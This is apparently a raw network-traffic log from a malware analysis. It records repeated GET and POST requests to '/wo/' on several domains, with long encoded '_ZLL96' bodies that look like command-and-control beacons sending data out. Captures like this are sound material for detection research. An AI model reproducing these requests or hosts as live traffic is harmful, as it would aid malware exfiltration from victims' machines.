POST /wo/ HTTP/1.1 Host: www.employeevita.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.employeevita.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.employeevita.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=1A6Oj5Do1XxwmRCP6-pvx3PdqHqnMDpfTcm7~RLzT8PBbt7TzBYYydhZ74ASEwZGkrNxbho6mMetzIUB7NcCpa1x6h01jG7wl2g6LZgaXzGh15oQ~sZaMh4QjTU4Ucd8Z-o9uyDEstvDY-4S1xG9QA24o7tOv1pGqx(J~ICCXQs60-w7O3DSid7bqKeJLnERX2Fu2ElNLl(z2cvUJ8Yhe_jKZ4A30bA82To_Xm8ccBlPOMjN0SfeY-oZoK(TK_0zFKTnmVJHE0IJyqxdBzHf1rwewkbzLYgY0ZL87KO9tEEpAEe9qo9YcN7BEoGEH6FlsJgxsCliWCI3Oc5pWuFsiYaXXNdJuE7Ai2BlNaDKMBqMjtm2I9G2(9yMxOFN(TzDw2vR9SzqS5PaFL5CEgJLNE5n0Rz5f84UMImozb(1bic82qAum3d_edMwYCMMVrNJVZ6SG0IyKiMqRsyK2hjauD4PBcrzuqVEASO-XeyYJfshPorwEbCegV31wA~2a8oxiOGMClHxmsQ0Msac4TwZweL3u1h9A88yzrLEcSsWy6ucY-mdxxMjy_reEHpx0e0XvwqT4yK9In~pvexzp2iL6V7sDJtl~40O2WGflGKAkkvalh2rFiYdVM4vOcmqU6uoYasqwwinzvX9ABWabqrWVZNwWTAIcs2R4g2bPsmLenuiITksW6IpLn~lOw0WOlh1~T9SqQPw2IvLmI(GKh5VkWxj5OaUeGuurzWDQCNUfjFwH2sHCXY5lPXUFueaJ1v26TKqRdvl2K2JnyDZ5tda4I4zi0JspoloXRpqsdMtu90IvOHlpDlydEahXmTtWbb-D0X9cvX45iScLV9DCG1kikGuKKr1ZpalXj2JEFYQEQbR3AVWEzIs~KGhDSA5gUp3hWCv5cDeDXXz(9unTjpCcuF2iR8kh9PUs7TKx9w0hiVlLAng7GiamBisuQ4V5-Brzt7BWQAh2P~njjBb19FtggDk4LYtpGll5uEQpafn6CCkYYV_NdA7GSw8cboJS0ECX5BDewCiB-i_7xs6Ywa1zfc3wPoO3YdS07VQF7~eNmOVzMKfmyeClzMi~SGkINiDEC8WfSRotiLffYzFYJ~YwXf7E9Vk0aA0xn1cCo5J5U16bb85jiKCl6amRasw3drNcmGNsKVpsy3Q1_uqrJsDbR0egbKKhirolXgwxlQLrErQus04qsgwoYNjx8PSd1yAzxe1RWfpph~ABSIOs7BcIKXkNMJWZczImCWqeTlc5wDPIneEzYgQKCJXpZXY9JosBl8paSBRlcVxC6D_zzic3R3A1WFAfcC79Qd18JLpwLZZ2wCJ9D3rTVlXk87CKvgYtcruUI(5vEpy8e~7DeuNlzRw83XqH65lRSwwOVldm2raqp7MnkrMPmu_M1pR1eZPjNUIMG9UIYBPDntRSKMHZFv_f_6aKObISFYgj-4vL-(GNcUbc1ju5w6lQPbgMUDwWZnazpD_n8w3eTCOAX9h8kM2c
dHbRY~jx0MdnOnREBRKeLtzNHFHIbNmtYaVkrNm~YR_xbrZoo9185M3(U8wjfQBJC03qDxJNSU_ck7YO4P5uvaN7MHTA97tjfwBJoHsm1MuZgrikO(On0NtjUUc4SxPZ9r0K1Xgta(R2OW-pPJh0BltaUQSXIW9TC1RUp1StTJMi17MW2AvhjN8aNsXZS0IxFaq7R3Po3MrElxp9-tU~B95H7otIP~r68qZ0aWZABEhZjtOr4Q_jMCigaGu6YnCKto97lVL369z(i6eJ0UI0K~TLXBxC1nohM1eol4I~Wofz3ga(vedcXsNJNiMsQvTlmXPub84WhEOXByTZY04va7WvPi8eE8QYcnBsbLUUPr4~5wudyCapczZsiv6eVbtJ4h1LmPI3gkkhKvV84LO0_9u4825XRX52Zn6HJsZ~eqwhXLe8RfVZ9qx(Q203vmiZnR5HuuZyiY96hOuXdDft_jaIw(ofKZUYpbEmPLh68dtE_yrfi(zPiJRTliOEcAHaaEm9DRgDvRk1ABbubLpUSJ99zSrrmoU~fbJPbuuJ0s-bfuAw59P7sLMqT5zsy(fgtSvGB9f~1Iy1pwv~fmMyJDku0VToXEn6y4PJUMFrSarKOxzqo3q9ynwOPhQGdPPcF2oXJlZhmUQ6qVwTI7LjbLrJ-bvggxNxABRu7TxYPR4gzYQN_BU\x00bgU6N5o
http://www.employeevita.com/wo/
- Hostname: www.employeevita.com
- IP Address: 52.72.89.116
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.employeevita.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.employeevita.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.employeevita.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=1A6Oj9(Wz3Er3jqZ~_4isneviX(oPRorN7za~V33cdfTfMLT7nsf7dhW94AdAwF-tbl5bgsQmMmy8JEE5vEr06JNzBw8wTnxlUdjMccaZjyvxrAX(dVsEh0S2i8heLhdLcExmXXs(4L2df4u0TmHUxS7jYRIuS4_p0Tr7IadawYwmZFGOzTv5oyhhtKYXiIrT0pu31ddZHnx57jMeNYcSbmse4R_6vw7xQB6K35keDVLcbut5SrZH_Yk3L2HKuoqGInvrU18DGEd5f8oDQqT1aggkVTzQYAe3bT0~qPjhk81JkevqoJQGazaLIGGZJh2qp50liU5W3U3U60tBbw9t4bXe9Ne43Tfi2xxOJjKNEyMyd21K9G2xdyOxOFF(TzuwyXd6S7qU9PYDoByVG5_Jk5rzQz_Mv8oMKWgw7T1WzI_mbQqxV14V5NtRiUcVrBQa9(7DVkZJiMrEM(WyjbejzIQcPKFsaBuBya1ZcScIZp7HIvOCouS1lns9gDjEdFHjuicJgfNuK8uMeC86xdasO2N7GVnF9Md3aykdGsKgYWIceiO2C4056OYaxRzx8cK4QCQwiC4LmC2rv8DpUehpTHUEpZu2c448X~V2RuxgDGM(EL4Yi99fL4ZFejVc4ytSvIwtGuEkYjMKwe8GfqBLoNAXDsqZtT70UmwLNrhNxvQWhJsfJsFAkGHJkEsJHwU1TVtnSf9waCznc21GGILsEgJnuKMZ03KrzuPQSJUeiRwUhAGCwM-3fXobueGUlrU6QqMSdblyNSXkx7D98kz1o47g10itpJVXTl-veY9q-0LkaTpuDl1PwaaA2ujb7HYDEC4W-roxHGyAk9GJEJjmknzLqnrCImCQXmLJWQ-Pyrj4AhgG3E3zouNK2Mm3Vtujj~zuNnnLxTGqfnESGd8eupV~GgBgvXgoLb7wdVVrxR3BlW542OC3luruk9M6cl_xeObZwkz6f75yWY-kMQJsRrH7rN8xzJwq8MOrp~h2xidf6EkSM8QbhAgd5EzFG1Jfpl0HTa4DvmO3CcGTiWd1tgf2f8F0ZIxwIFKVYuvLxWoz-HUtHnViUZ35BqFAMKTIQkfKRgyr3f-PZ35RJKwnkOZIJJFwd0-xiFhCJ9J7k96aIE5qCW3ruK4StNO6oXcQECcuv5M(A(Zx6WJgMY3OTR5xe6HoDuuinoG2WMsrBXQvORK8t956N9OxdnOclSTkzKbIWaJkzmsRgJ1gdAuD_rwO9l9fcjNqEeedWQi5lL5EnGryaInIz9FvpvKud4LeyoBRGJWqutlb9750B~E8QTL~UYYa-ukrUZ24v(K2sFt7T2-qHzDGDI3gPjRTts4ovfSaqjj1GVYya~vbrq1hWRBxkC7f591ZiV_O30ZikfCwKHfvWL7ODSuJhlN3t9ek_l-I0ttTLNlHX5WSrkoRViyQcOSMsjPJVkImuEfY8~Rfd4ofiGP1Q60LvC6HWzwWaWR~pm_mPU9dCD4I0MB6lY3
X8nnWZiP~UIWjrv5XTRkQMxFTH9pB6Qrm7e3yaJh5cBF3pLIpa1ooaY3sUcB7K4MIid0uDAYPQEJXEabO6r0uKak8cyVcN(wleQjNM(_wVErGhidyv3oi3lt3QUYy1ZbGLziL0XknYbGnNaUpfVPhCRYPEwwcZS_ETtBer9XpTcdjVHmNhI73BljQNRbSQNpiVbt2QDipHQ5Eh9IxJpT~F9mLKA2Icut2das78jmEmQBViMHiqh_6f6bxOCzl5yhBPdw4EEewdMM3FS1KlFRxcmtAFY3EHjTg4AcpWYMyHlh3yto9pj9EloMKPbUlwzelzrov4QCXjU6C2S9MrMl~5Knjqy5Lkhbb4utkKmaduDw0ZBkQgma(JmRrCylUUznVpNKGybo8x5R26e28dmexMtG48(IbBWKx6XETaFt25Kq~2P83gjOc_yvhQ~0~tCYdW5URdCy7FEx5C~rW6ra8JvYf33caaNdYZztjPHemOxwYs(4Dh7qN2hPShqTLd5Sc75q9Gsqdc1JiANay_H-ShV3yGz360Vv5uC8Q6jRN38LaKSg9clqk-Ty7gl8(xubg-aZCBd_(REoyqR4wa3itp3TjWVTiVY26jEwEncd6TrdM-FYlprhrgq-av84CtKdZEiKA6wyqzlK7IdrXrDMi4TtZNvVjzYKpWVkq_L2WdQL1Uk-D6oDlaev3UtI6CRTvzGW(SsRP7FKFWpnTxCyQW2BgQNw9CCjIxYhxBDSXrJQd0wS00jcxPsUFZWxc8iK7tNaGXpUFmq6v9~IVUCygEvXXFNgOaEDpb0NT4dFFYBrHwzIp9G5TNXhjLm91b0CK7(CPvSZMfP1y9sMn_hDkjfkPLG9yGGXyMHO6YevqP7BZWULpYwvxQMXLwZyzOM7qj0r(vCfKN
http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
- Hostname: www.pq-db.info
- IP Address: 62.176.235.43
- Port: 80
- Count: 1
GET /wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj HTTP/1.1
Host: www.pq-db.info
Connection: close
\x00\x00\x00\x00\x00\x00\x00
http://www.pq-db.info/wo/
- Hostname: www.pq-db.info
- IP Address: 62.176.235.43
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.pq-db.info Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.pq-db.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.pq-db.info/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=G_sYl9eQeW84zqgcU6z_2dJJ59i7zm57KyjOdw3CPrHBnOcPKmy0MuB6~jDWfaQ88s4kvJXyZ1K4zcArVo~IPMB8UtAp9EelQLsGsHrLXsgyNwjxEmppBCCrUs(cBw1Rig8QcGrI(CGmqjLhdp5wIGf51FhjF9scZsXixt0YWT9FFVsgFRlV0v3Qr4n5HHLzP3JvEqfIZsW6cov-6GkI0GfNqv8Go2aU0rLncHfOZvKIlpMQh9~kDWD1HB~UiKBpdIgjJzN0EWdRYXBbS5d9zf(lNHVbl_HIHmmeZtVFmomyqmyMAprcJA9m6qYnQqlV920uLeEBtTFbxCN8PkvmXZTRq_l-XjIBIKGsMGMYZz6ke7qLNffMyfSSYuXoh8XLp0nFrhi_kbG3I8yb7eCsSpvnCv4b8eK0JzuMOAdSpGoAVcP47EiBtadyl959Wd3pwx8nha9NJGC4GX2SC-DTPlU6bWH4npkX(0~B2cxVoFCGue(k3Z7eM1nXj-Tf5XmVJIt_kPB3eALU6fp-c8DU8UZ3fb~CD0QuIvIA95eeI3hdHkpp5L9AJeb06tYHvlKZ9zfAaIX0SKhJZ-CO3Yet2FJgdzQ9sIRFU4gEIVoh8g5mVAQqLkavt-gzRUgTGSjeaP~l6xdWCH4yJutIGIjGWrwIdI0773SKjRcUpeaG7G1gmBTUiNNs9xO6vIAOzAU0fxh5~z4RDoClqZjHY2JfOPULX8sLUAoQmtWtCUfIauVEv3iru7ARqVWM3I74SAAIFF9SR_tF27DIajS2D3vV17ds(21Sp5ZnWq66dveTXSbQfXHizkjCqIjlLvuoiR9jw7X07Nq-RnblqA7FrLbE6JZIdDnovaDvV_NoxlStxFfak1ujDK5Gw8uu2IDI72Gco9vpqpiUaX188hXV1E5YlQKiyjRygcTr~S8s7SytDy658YcuUlcc6aEZzBTo~5t3ZPtw~mV2bOFuLun-cKVMpF32Tr5bCshfP_AcP_E2X8xOdblc1soHzgh0yqc-UjXNgPRAeBOlVCJUlalvFpW9hu0RZVMSkixJ7soQaF6eYEc1Jt(j64B5HTvcJpXYBjIdbw6R888qawlXVe1cbhduCtPOVTlnOX2B4p5E~aEmwaY-Xp5o7BNNhnF7H3UUtJRhzrVLYT4LRiw4LX5hyvKjMXnvNTU7TzqbrwligXiTxSHeHGqpahPLZnA85CoUxmpPlxdNd9I-E1eeGDZDjQM7r7Y5k9Wgp1fSvZiIf388yhFFekypi7ig(rnaPPqACNDCH8U2Zy3MhCwrxYqoI7fGXFb65uxjtnvOnV7nNLCdxbVGU7iLTFdETK9lgMOylHXfttFnFmcYYYvvQdcY3Whw1K6MtQe5KEeVSMI_0ZSqtybJ3tiGMlFbNMTOzkyuNS0trQbnMvEs4jaBsHzJs8Pwho0G0lnc6QBeDtZL8CqlethdP0SvcSowR_BTnwa7yY2eFLq0TyHsKfKpyaQdmVItYV0HSyAk(q(PglNyXv~qJ34
4l7U1fX1Siktro2AgoNmMb3j8XQnDjoH7MlcT7-m3dLiJdRoJg_QGLnp8hgyReT1Cz04HkP0K4s~oYtYYHjA66JuX7km3F_51pOQ095o7Lf0TgLTQJs7PqDNkJjdxpq6IAR8k(YdqQ2WI53VBw2ShWCJtzVQjbyy5U1b1aGn9LuOTrbRp1q9mqk7vy4ia5YuUF-bDO5BKNT8WOhWueG~YFrYrmv7ImySDNZPYwI1WUx8JSBL_41QcmLx-V0sO6XPY2VARzRQPxyA7DAcmojZkFIWqLfjvCVlxa_R_t-tEQMomSK4oKcHjsSww0XLGs119hChlgPRl3L8zsD0mgYJ3gNZGk3uLh1S2ui(0eaeMpZtRhMDCHIB7EKZoflfBXysim0MUvOjKbnj2XZWQpKc0G27dHvNacRqiQNe8nLZxo4MOWaratYkrUwurRLgd2KFiti3At1MaqHmrkTQv(1OvHj4PL2E3fCv83cJRnPmmVp2C4RC6TPc_butLKjiPfsdjYR32eEzLbwfCFTeKTGtjZAjnuJ(b2JwbU6f1GMglYFOiBUfvcvH5~sBKcofllJI-dTlR2rMBBxuQiCRoE9ruWJSIxJYrUlDekYX_oi9LPDpNXSE_KO5N9ErOL6bTejqvXwzxYMiZ2xo0rJcC9H~6KJjXjsWSrEvN\x00Ru7TxYP
http://www.pq-db.info/wo/
- Hostname: www.pq-db.info
- IP Address: 62.176.235.43
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.pq-db.info Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.pq-db.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.pq-db.info/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=G_sYl_uEbm58544jZbjvsM4o3tuP6RdUV1XadxHGF-2MjvMPBEa_UeB52DDVbadLgO48vIDYZ1S7mIcyE-jKH8MFWt88sWmmQoQR6WTLcNUwIiLQI0N1OCupA9HVTAVKzywMKXL0oT~8miLFdKZ8N2L26ixlGadtVJ7M6NtCb2dLTWUeFUdgzvnlkfT0bFTNeklvXqniB-e0QIP28Rw18VXw~9kBy1Spzoz3BVy4br~6taV5hdKVE3yVAGrQje5dQqE7DyRPJExnXmgif-lLzvPfKAJb8enOAkesWtV-gsz9jGy4Ap~TKShQ(qY9dOQfrmsmC6BasmpbwnJVJmG3LJTKorJTBUowIKX7N2UYaxekbaaMLffM8PSQYuXeh8Xyp3HzkBq_mbK1JKn1se7dMZvrFrs726yMJ07PPhxSv28PEJrk5ViA5IBisdwmWd7gxwtGl7xcOGC3OGO7TM7XUkklElnDl5hw8Uq0171JvyKom-b0ysrkLADgpf(Hn1iAbZNFirhLJ1GZ7uZCMPPAiElmU5rBThZ8C6xSv560CRlJaRw2~5JXM_zl3_0Z60aY7CLHTca8XKsXIc3q07jO9GxEVzND05pdH5ZzDWVF7DMvYShtDUn_oco_fWkrOWffXL6j0zllHkAbBZg9Z6vqIcFgcYZL2XrgtSNIt9Puq153~AmJkepM5W7braJlwhsUeQZGqgEcB6ucmLf7G1UzL80-eM8DU3k9mte5CEbIZqVErw~ouccW4FWKoY67NwM6FH9wAPpFh4bOdiSwHkypx7d0zSlBkZ5WWoXtcvjmTQrfOjKK~EjFoq3ea_Sx(lAGwLTkgMGuAUy-9XnAgKfD~KRmcj76mP3Yaehm1Vi96gng9kLWFOtezN~F(pbTwyeJuO7ts9bgR0cwoCuA1lA9nUyJ9F4ynOa8pS186zWTNkCn25wEU1RZxbMSzzTC4YQ2IalrnXAvANpxKqGFYNd1oUOWTL9Hf8IfBodSDsFyVr8ef7sd9JYkrCQVxIRLFz(PsfUxWRueZx1xmNQeP5ig2Mk1XlAZhj1l~eo7VW63fXwEE_T1kZ8mLQyJJ_OIJigNTiyUn4NwbVApTqUnDQZGV_f_TCc7EwDM4rBu~7QmyqQ-V5Zoxghwvzc2EEA0g5UhmYBNa2NJS08lPV8nqaODHkTFIhY-dUy4tBwBmgu0xQXeEleWe13mIXh8~jQIx1hUyzJZbJheNgjJRRJg6nwEgOtunM78ohacgeygYyI38TB_SkKGtZ6X9bidCej1NtHDL-seRjzL1BIk8LmUCuXeM0Txv9ty0i34ikTgIoTj040vMJWsXXpocIo1g8u5sV7Fn9puLCUkA6SefeBB83Zcp5e13n2NXmKvc8sm07v2gGDS(_evTnVsOoOUjkSyBDo891jSB8ERhSqdhXn0vYzlp4oeq3zU3UdpINdjsjW3d_gIJmWcQhIeS_Af8wCv6aWeFLy4QiC2JMejyI5nhTUQPnEKZXUc2-eKpFwwAd6eFw
kss8gbXH8nqBIws2sOs8iNLnHaVhvws6PfHUwT5PGaG4qbbyYF(-gkDFp4kgSZeRRBzVAx(PAN3sK5eZY2CANM(Jmc(VuDdexDmcY0pYk_C8gHupXabfTLhAlzakEU8KmiKiIorI9YfnSO6nsEhFq4SCF3y1VyWyG1C2z6em7WAvfw4LQu3LYArU(9y6zu4J~TF8LCE7BFNhsmSlTadAC-CKMLkMjM5EOiH73hyIlLakNiRy~y4XoirK9OT3Eb1GfKnzY73j4e3A1HFxF2uRpgNfHNcuv4AVRDT45ru8lXJckbf7hwL6WStTYuvETgw2NWk00WjP9k(7QxuhFyqIVypdxehwSMjH22lhH5OKaet5EIss26KcVfA-RSXnXyY3ZwxU0jvO7qCniJX_bnjolKNVP9ONwJXgWDTPW-uahx(J8ocLS4oboIZSuvHaJ93rRvvg3CjnpD8nC6ngB960iAPAIOEVITQ1n57YpPmOaresDV~zqeTP1jer1mAzvFT9knIyHrR1vidTjfNET5b3wcXg3at5KsxL9haeTXWf8mcV2zBnHNKcPZ~J4RDNi2rKcNVj52pewBJwqJkRlXNPL2BaG7y8ZXQBrBjeXb8Ch8CQ0LLlIdbZAm1VX_LcHIaEXtXXubB-KViRZUuewPzzqUVovTxYWH6Qe9wtByO_9D0JkFLXIv5h8mWpWoKHpQfLFqDtGeXv92nhy4NpifVPspBu4gLk9mZjSFwBc-atqXrM9Xeewi~m8t29GEYy9laoC6WczkRFIbRemrxT9u050F26HOtT6iV8X4~YT2mlrdiFlUsL7YncO4dcPA99kp9uHBOxh7RkwghLK9SsVWqDg7sjr_CRYf4jhz28cRe8Vmm9rqtbFJpcIZ1YVc02n-RQTnejfOlF3D
http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
- Hostname: www.cnweikang.com
- IP Address:
- Port: 80
- Count: 1
GET /wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj HTTP/1.1
Host: www.cnweikang.com
Connection: close
\x00\x00\x00\x00\x00\x00\x00
http://www.cnweikang.com/wo/
- Hostname: www.cnweikang.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.cnweikang.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.cnweikang.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.cnweikang.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=GYAUGE2Cs_KuQ4Xz12U2dF6cRlzaL6tBYBiwgf4zlJc05zYNFtZ_aj3pHS9Wha758cFKBWSD1S4DnEE1f5zrri9Pm2M91659it3TFke4VyCO7S44fCi4AwozkO7Idr0exOA0Xomqh6cDK_AgHDtR(a5ZHvhOTgyMwDBGhg25ZaybXZj30WOiloXDRzuhLcut9vv61but4qJsI5g0(tQtM3(Y~ldzsvq1ReZ6qZ1WA3Ku84uKsbGNDNF5n2XI(27qdEjjHOLW8UBSFhxljHLpmE6DIgR0LDc2VvF3vI4Wyxsasys0ybRdcX3KaZ0FRFjl37DwZS09fqvHe4FL9DDnfgQp2SpazK9_sMdXo2TBoUSJJCFV6LslBPomHeZAzZllRxCksCO_dnShuCg8ZCWmLZeOzxSrFwBOl-ZV3027Lkz2ZH~R7SbziDnGhUTqi041Xk2oofYWX0glty8B17BDW99kO-hpdvZgs8q7pQeEWukB(qQyTJ1i0-~_piWu8GsZGco8cFkFacZuwUbOpqDj4QykkGnNZtYCGO2lr1DEPbnT9y~KxrXVJ1DxXtUFUB7I2ZBDZN14s0HNZV632tv-2IKR0ynsGq1y~N2Pgpqz3wxDsj1IjYbPzQAmRWQOVDZJq2zU9pckkKcfFOmMosz3bcjlsT6YADDax0okeiV-aStTp9KL2_RZfC6mPDlDunwVlpng3tZiccKMoOCD7smLDEreAuK8~d~mjnndTaV2z8tt3GZGHsMx1AEymAR_d8kFdMXmdPoDxDRLWHH0DVI5ujctDo0zBTTHSrAfgSfOa1siqGJXftlMm6q0bqNmy_iknRpB7TDCjRguImjtH4DxacwSlWTna8PTxjtQ3mXUPhUzB6l1~poO(iYYzeKgBc2QL5i_8fc89Scw4gi4erjX3rIY7Tp7M7K1UNGTD2hMPTQ8lNAIEGa8H4SadjbhTZSZEn2ofyVfogfLQEmlDknx51Di7roIFC84raJ0ITXsqVlAFD3cDxKaRXyc~qdyTzkOQ3M2D5CQA5V9SaJ464qL~QEBt3EQn7quYTfKolO8xVTQjcWUmXtacGWwexbBUF3ziF7peu88HZ48ZKFMhZjNNACKVzV-S2zOzcnOoBIzUGYeCCrRElkdKd8yXihBXJXRDtVlfsEeJ5S6wt6j5-C_a-5PNV(QFeOE3T5sIegBkxTw5EfrgZhboXFdtZgwE8qkXEfyxsrJ(5bo4ozp3g70(TDp~win2aZ3GLWmMiTuVkTatNQA7HXY29jFxF3n8oDaHT~7CsYjXw9cbQY5D8D2fVTL6Gf_AdQbgIhFZ0UZC82OxMSHiJKwhuERxS3ZAjhfUuMgewPlb5D_hhAU2ElD(0dki3Y6fXq9vw4xoaWPvSa1AN3xFOZ2hOya5RmOo6E9ouNLlR3djqp1m_f_RwY6Q-a8j58EIk~r3I~md9XNahCGMnT3yAV0R3G7qxVJyOXqtP76lK2MfHpjMrXKJQ80cGMAUFGwDANhdT
HWdmMwSfPru-IWqA4Oc22WT-rM4zsKeXfCksVdbImNSNF2F3OdhGQJfsbGTlmFujCc0Fgpo0jUkl8cDQ5gE63lCTmFxStrnIph8Unb57Z867Xdreyv2AzUEKpw24sjL78e9Vx-W5gm7GpEGi0qOGj2OsrvGuv9xiLQw2cp0iRYZDGJGkW-u6deDnb2UVdr(N~aF0FhVxWNNlt9WIj0S20xp0aWjEaIBLbhooIMVd6_1iiSP6FDWJJvVtw49ZaGZ8yeZMGdGHyQYo4zEXRBRhPMh5jkqUhpNP1G4oH0CGHeQhPKSOCVLjQjPUz5OOCzcAojs373oPo7oBR1nA6u6E0Yen4qc2qd3L5Q8XmVMPPTxPw7Vr(60WIlTCRgSnZlEzkzzb41O_nAhqi8S70zYt1P5_oXl7nUWKs9b7oUtcsrpI(hMDE3hyAQaK5YmxqKJ8Z7Rl7INe1x30KoVfoRNlG5GPEVtLejYZ2KhHGw8HsCVHYWoY~VIj2jkzSkuWnA(SvOjCsTM6k6tZGVFTzQdwF1AzJCYZJGkLehPPKj9n9mahzd(GxjWoSHUq0gltQG05tEP-u0eiUYQwvCndwomGWhNI(Req0aDUOQHHxBcriUojQbpTJo9ebDkyNXNaccC1h1qqnh9bH6kU9laOmnEfMf8PnFViCmQuJBR6bRBb6W\x00gzYQN_B
http://www.cnweikang.com/wo/
- Hostname: www.cnweikang.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.cnweikang.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.cnweikang.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.cnweikang.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=GYAUGGH7uPOFU6OLx08cTFKIa0jQGJN-GDaKgfI3vdYqoDINDrN0Uj3uPy9Jwq3B(P1CBXWl1SwcsFUwafn8jS4rk3ovx5R-svLfOBi4YiHI1gR7d26_fEMxqsqEU49IwtwoUtqWl7U-E-AYHhNN7rdWScdMTDmy8mtetAOQabGVVKbV0XbW(Ym3DTXXCKC9wIP63o(wg5xuWKYWyalVLE282EtoieKyCsBUkbZHNSuiyL22r7SWAYNEgxLR(nW6QhL7DvXD60lORkFdlmPxl0K9QTx0Fz80ZNtvro49iAEejStNybdrdgHgU50HMXHPnLbeXyFlfYXHeaNY5xr4VAQy7hR3kNF0sMMU5WbB5hKJOj1W87slU_okHeZIzZkJR3WgtD2_JUWjo0cMIkmCO5e401(8Bwt1l9oK51q7H1XxcnCK5Aj0qiSbo0bAi0k8WmfBv_kHQ0gi0RJLx-scQoBORtBSefdGtcOOpzPQVtgV0L1JFaEtzPOItjqA2U4yBM8Gak45S61kxnzupLH_x0zWvkjhetItD6jsqhKfH9jPzzCk0oiENROta70HQkfLwqBERY0yr0adekmi2PTcycyliC7nb7cVn8OFlK6SgH4ToRUbvo383y4qYQYmTitIj2DSj4gXz69_N4zzgtmQV_LVuDmxJWvJ1WkHUhwUNBhilJaTu_tpahDYMQcsuCkHtof1(qs3eN~t4PW_nMSgUGLvJeaK~tOfjnfBSqR2y8JtzB1HGNMy9wEwiARjFcondOm_HPsD5ThJXEv-EHVFgDcfFpIsQDz6StxejTi7e38t6SFbedlXnancSKAmvvyOkhscsTvonkM-N1LoCdrMedR1k2WgQtC_(H9WzVefBD0FK7ACud8GxFcz96v0XdDQEpSjs-IFpEY7zyqafKr5qbcjmjJ4NufiQ9~2RGEtGFB5vvUUEWGkDseZaTD9cdC_VkCrEGcWnwbURBCzHl(U~l6C6LscYWohlKo1KkawsGVhJB3KNkyxSlyu(MtMaxEIPFQOPpjgDu8VBdtEyuGj7iEMvhYxi5WCT0bxvH~Z3DeokpGC4zx-MUnVel~hdEvjgz3gV4BmB8dGUfV0qpHlLD(oWmosW1aBzd34plAzX2QeAQjRKB8OVfYgWVgUUYTmGqBnZKwBLPej0oTjx_K1es9xeXyfQtCRwjwTPo17k1rw~iHUm6VirW5K9r9vGsKJBm7YkMP3hNe5ooLayinLwm~-4Sn71pBEebqGfQLXV2GtqtIw6F(vr9nT5WnLwIH9c0KTWPFhPXRyZSUjEOf-M0qou0D2Mf8Tm4JCW1sQGd~26u2J2tWqpu4w8CWILxN7Qd4XVR7nD82MshkAiX4q7WoN8wgoeEvC4VIWp4GkrDGLJbzmJ6hBhrPG8C(VrN1nqsh20SG9vLcspvK3WTovI-vztbJBHlus9oCeLfDxd3i8J1L8zXITW3GQ9xNd9KnqtPjAsLGZewxTMb68OWZWaH0BTDLXAFsmb
